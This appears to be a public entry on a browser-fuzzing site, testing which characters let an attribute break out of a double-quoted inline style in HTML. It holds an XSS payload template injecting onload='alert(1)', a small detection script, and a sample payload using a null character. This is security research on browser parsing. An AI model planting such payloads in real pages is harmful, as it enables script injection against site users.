Hacking...

Characters that can break out of an inline style with double quotes

Created by0xdef1ant

Created Jul 13, 2024

Updated May 27, 2025

Detecting browser...

CategoryCSS Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

Template used:

<div id="test" style="$[chr]onload="alert(1)">hello</div>

Code used after fuzz:

let a = document.getElementById("test");0x0D
if (typeof a.onload === 'function') {0x0D
log(String.fromCharCode($[i]))0x0D
  }

Sample payloads

<div id="test" style="⟦00⟧onload="alert(1)">hello</div>